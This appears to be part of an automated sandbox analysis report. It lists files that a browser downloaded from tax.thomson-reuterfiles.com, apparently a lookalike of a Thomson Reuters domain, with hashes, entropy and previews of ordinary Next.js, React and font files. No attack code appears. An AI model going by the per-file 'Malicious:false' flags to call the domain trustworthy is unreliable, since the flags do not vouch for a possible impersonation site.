                  Preview:<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><meta name="next-head-count" content="2"/><meta name="google-site-verification" content="27wxy8zChhtA5aSjzVrIEj2ON_2R6X8iKBWg_iGK650"/><link rel="preload" href="/_next/static/css/6c5712a607796dcd.css" as="style" crossorigin=""/><link rel="stylesheet" href="/_next/static/css/6c5712a607796dcd.css" crossorigin="" data-n-g=""/><noscript data-n-css=""></noscript><script defer="" crossorigin="" nomodule="" src="/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js"></script><script src="/_next/static/chunks/webpack-2555a4296ab7a1b2.js" defer="" crossorigin=""></script><script src="/_next/static/chunks/framework-0c7baedefba6b077.js" defer="" crossorigin=""></script><script src="/_next/static/chunks/main-49b0a41ec78c7394.js" defer="" crossorigin=""></script><script src="/_next/static/chunks/pages/_app-1e66c022522ffc96.js" defer="" crossorigin=""></script><script src="/_next/static/chunk
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (1966), with no line terminators
                  Category:downloaded
                  Size (bytes):1966
                  Entropy (8bit):5.172480733240752
                  Encrypted:false
                  SSDEEP:
                  MD5:424CAF40614A148FC5159DE89A28E904
                  SHA1:86EA812BFBB08497B8102D8D65D949B5FBA4E742
                  SHA-256:8548F0E5D0AD9F008612807170927D4E3126C46496C184C05F0FB1CE4B728003
                  SHA-512:EA9CA9A7CE2961671FA958C06D2234766DEA994DFF0B0980215867DCCA66886F19AD4095BB734230241C706BDD42667DFE02573F415B48D9E437BF8CDD014A02
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/webpack-2555a4296ab7a1b2.js
                  Preview:!function(){"use strict";var e,r,_,n,t={},u={};function __webpack_require__(e){var r=u[e];if(void 0!==r)return r.exports;var _=u[e]={exports:{}},n=!0;try{t[e].call(_.exports,_,_.exports,__webpack_require__),n=!1}finally{n&&delete u[e]}return _.exports}__webpack_require__.m=t,e=[],__webpack_require__.O=function(r,_,n,t){if(_){t=t||0;for(var u=e.length;u>0&&e[u-1][2]>t;u--)e[u]=e[u-1];e[u]=[_,n,t];return}for(var i=1/0,u=0;u<e.length;u++){for(var _=e[u][0],n=e[u][1],t=e[u][2],o=!0,c=0;c<_.length;c++)i>=t&&Object.keys(__webpack_require__.O).every(function(e){return __webpack_require__.O[e](_[c])})?_.splice(c--,1):(o=!1,t<i&&(i=t));if(o){e.splice(u--,1);var a=n()}}return a},__webpack_require__.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return __webpack_require__.d(r,{a:r}),r},__webpack_require__.d=function(e,r){for(var _ in r)__webpack_require__.o(r,_)&&!__webpack_require__.o(e,_)&&Object.defineProperty(e,_,{enumerable:!0,get:r[_]})},__webpack_requ
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (470), with no line terminators
                  Category:downloaded
                  Size (bytes):470
                  Entropy (8bit):5.434697340185277
                  Encrypted:false
                  SSDEEP:
                  MD5:B46E5B6908337511AFAC3760D2E1E518
                  SHA1:D947F28C2EB370CA33E2182E36D7D7BCCBF31AD8
                  SHA-256:B06E69FA3D38C5D4428B915BA50061C4CDBDA9766870CE3BF3525226C43EABB2
                  SHA-512:2127A842815B996FF922418DDBD343FCA05DB0E56871938EA55456DDA7A91F412DBD9097389071CA9D0C1EB4744400ABACE931A706997D18FC0A375B26521F2A
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_buildManifest.js
                  Preview:self.__BUILD_MANIFEST={__rewrites:{afterFiles:[],beforeFiles:[],fallback:[]},"/":["static/chunks/849-a4a13dffe91c49e7.js","static/chunks/pages/index-899e26e961b4ef93.js"],"/404":["static/chunks/pages/404-7fda4da57b5079e3.js"],"/_error":["static/chunks/pages/_error-ee5b5fb91d29d86f.js"],"/sitemap.xml":["static/chunks/pages/sitemap.xml-66ac2aebe440de2a.js"],sortedPages:["/","/404","/_app","/_error","/sitemap.xml"]},self.__BUILD_MANIFEST_CB&&self.__BUILD_MANIFEST_CB();
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (3627), with no line terminators
                  Category:downloaded
                  Size (bytes):3627
                  Entropy (8bit):5.366412655772073
                  Encrypted:false
                  SSDEEP:
                  MD5:75FA40EDDBA53306AD2E634AD1BD5E5D
                  SHA1:F764E73DC771AB69130FAD742B93E45A5B0D368F
                  SHA-256:CC67D35B4F8D98C17C105961CC2F26D8C98457922DF87EE3FB8C08B165BBF097
                  SHA-512:00B2EE38A0DB465890A9B40DCAC8EF122774E32F47A8142D167A35A22FDF9E1FEDEEAF60C6415462A997D033DCD8DCB7818800E360CA1A41CD0A976B7C14F7CB
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/849-a4a13dffe91c49e7.js
                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[849],{7219:function(t,e,n){n.d(e,{XKb:function(){return FiLink},Imn:function(){return FiMail},IC0:function(){return FiMessageSquare},ViN:function(){return FiPrinter},jRj:function(){return FiSearch}});var r=n(7294),o={color:void 0,size:void 0,className:void 0,style:void 0,attr:void 0},i=r.createContext&&r.createContext(o),__assign=function(){return(__assign=Object.assign||function(t){for(var e,n=1,r=arguments.length;n<r;n++)for(var o in e=arguments[n])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t}).apply(this,arguments)},__rest=function(t,e){var n={};for(var r in t)Object.prototype.hasOwnProperty.call(t,r)&&0>e.indexOf(r)&&(n[r]=t[r]);if(null!=t&&"function"==typeof Object.getOwnPropertySymbols)for(var o=0,r=Object.getOwnPropertySymbols(t);o<r.length;o++)0>e.indexOf(r[o])&&Object.prototype.propertyIsEnumerable.call(t,r[o])&&(n[r[o]]=t[r[o]]);return n};function iconBase_GenIcon(t){return function(e){re
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):5118
                  Entropy (8bit):5.42635093571842
                  Encrypted:false
                  SSDEEP:
                  MD5:8283D5A5DEE609F59A5E2D8178FAC306
                  SHA1:33C121F2C64F6BE3535693EEDB43E39C44812FCC
                  SHA-256:EFE2A4309C2E2CF8B24023D7DDD9F65C50F7B2E187CB28C1BD68AC8FD1D88BC6
                  SHA-512:7757CC826335058EB94B682C740ADDABC0424E9A7490833387A8E107CE3DE08F8A7254C05DF6D82A50C4353DC2BE09CA3C34A1704E41B427CF642398E0E43AA0
                  Malicious:false
                  Reputation:unknown
                  URL:"https://fonts.googleapis.com/css2?family=Source+Sans+3:ital,wght@0,200..900;1,200..900&display=swap"
                  Preview:/* cyrillic-ext */.@font-face {. font-family: 'Source Sans 3';. font-style: italic;. font-weight: 200 900;. font-display: swap;. src: url(https://fonts.gstatic.com/s/sourcesans3/v18/nwpMtKy2OAdR1K-IwhWudF-R3woqauLY1HY.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Source Sans 3';. font-style: italic;. font-weight: 200 900;. font-display: swap;. src: url(https://fonts.gstatic.com/s/sourcesans3/v18/nwpMtKy2OAdR1K-IwhWudF-R3woqY-LY1HY.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Source Sans 3';. font-style: italic;. font-weight: 200 900;. font-display: swap;. src: url(https://fonts.gstatic.com/s/sourcesans3/v18/nwpMtKy2OAdR1K-IwhWudF-R3woqa-LY1HY.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Source Sans 3';. font-styl
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65202)
                  Category:downloaded
                  Size (bytes):141047
                  Entropy (8bit):5.3354666088633245
                  Encrypted:false
                  SSDEEP:
                  MD5:71351D23ECDBFB39CB548F7CB628ECF9
                  SHA1:12811C1FC35D5864974BC4B98A641C037B56B9FC
                  SHA-256:1CD1CCA3AEBCDD10C33D713A95479909354DDBC5D5AD9761466AC27EA528895D
                  SHA-512:7016A1D5DA3B69C5002CB7079CEC48D4A7AB41A3C9DC2EA29D1EA3F236B7DAD83F4380AFFC75C2772D157327F94F6A0F41723B85F5031FF6EB732AD052B279B7
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/framework-0c7baedefba6b077.js
                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[774],{4448:function(n,t,a){/**. * @license React. * react-dom.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */var u,i,o,s,w,x,C=a(7294),_=a(3840);function p(n){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+n,a=1;a<arguments.length;a++)t+="&args[]="+encodeURIComponent(arguments[a]);return"Minified React error #"+n+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var N=new Set,z={};function fa(n,t){ha(n,t),ha(n+"Capture",t)}function ha(n,t){for(z[n]=t,n=0;n<t.length;n++)N.add(t[n])}var P=!("undefined"==typeof window||void 0===window.document||void 0===window.document.createElement),j=Object.prototype.hasOwnProperty,U=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 3020 x 388, 8-bit/color RGBA, non-interlaced
                  Category:downloaded
                  Size (bytes):135160
                  Entropy (8bit):7.959503731592724
                  Encrypted:false
                  SSDEEP:
                  MD5:8626685AEF425B8F971E7FDB64FACF98
                  SHA1:2F4042AFD5312BCE15757730870ED4ED7ED86F31
                  SHA-256:0467919FBAE3F5AB1B3109BBC941916142A7C68FE16823795F6CB13BC7E936A5
                  SHA-512:E565B4F94019C358610645EC826844A1498F03AD2A86BA962C26847BCCC3A0E1490F21F7ECE24E19E7E26DF4FE64A2E0AFDCE3121E7548080545D61B1E1F7031
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/media/search-background-desktop.a9bd8cdc.png
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (29860)
                  Category:downloaded
                  Size (bytes):30040
                  Entropy (8bit):5.166885302002284
                  Encrypted:false
                  SSDEEP:
                  MD5:31DE4512A833E5551978867D98FF011C
                  SHA1:CD7032688634A063ED7AF8B36400C61D575742EB
                  SHA-256:B2EDCCC182DDAC5009DB3D04D352201D7833006B9EAE33F5E8ECAFB6FC976FDB
                  SHA-512:7614EC6B5C309E62ED66AB621142E6A8566D8D3B8C8298E5C4E05CD41A272A9715E3E06631CD5047112B85F99F01646902365C3A70EA16202766A72B4BE69AC7
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/css/6c5712a607796dcd.css
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), TrueType, length 39304, version 1.0
                  Category:downloaded
                  Size (bytes):39304
                  Entropy (8bit):7.994120188451945
                  Encrypted:true
                  SSDEEP:
                  MD5:20DCA63D8EE3254B712C7171AE987713
                  SHA1:BFF49469BB0DC3989D8DD4726A85D060396B100F
                  SHA-256:CCAEE6F0BB7DCF2A0EE729096CFBA2CF24EA535E068F6CBFB827F79733F8181D
                  SHA-512:F1678F40E5DC86ACE717DCB33196D31BF2951C36E266419E61580313BEFBC44C049CFC86267A5156C20B561B3ED213807D44A96B8F57EB22E04BD2133CD7AE98
                  Malicious:false
                  Reputation:unknown
                  URL:https://app-data.gcs.trstatic.net/wel-trdotcom/fonts/all-characters/knowledge2017-medium-webfont.woff2
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (54551)
                  Category:downloaded
                  Size (bytes):202199
                  Entropy (8bit):5.911594171548854
                  Encrypted:false
                  SSDEEP:
                  MD5:4CBBD1EB0EC89177917AD99F6C68F535
                  SHA1:DD9DF4DFDC929A5193122BBD1C9342CDF59F4FC5
                  SHA-256:BA7D803F2960371F9C72EAC0F1D2C9F2C874216C29470746545A6DB212BFD3CA
                  SHA-512:954EDBDEC7AD7AFA4F89E29C64C803C17F0D1F80122F15BC7B61574A908B0F4ADBD4C2FF8D871C5C8D371CDA5E0E2EDAB6BDA583ED0EC03717BAC476392B243F
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/_app-1e66c022522ffc96.js
                  No static file info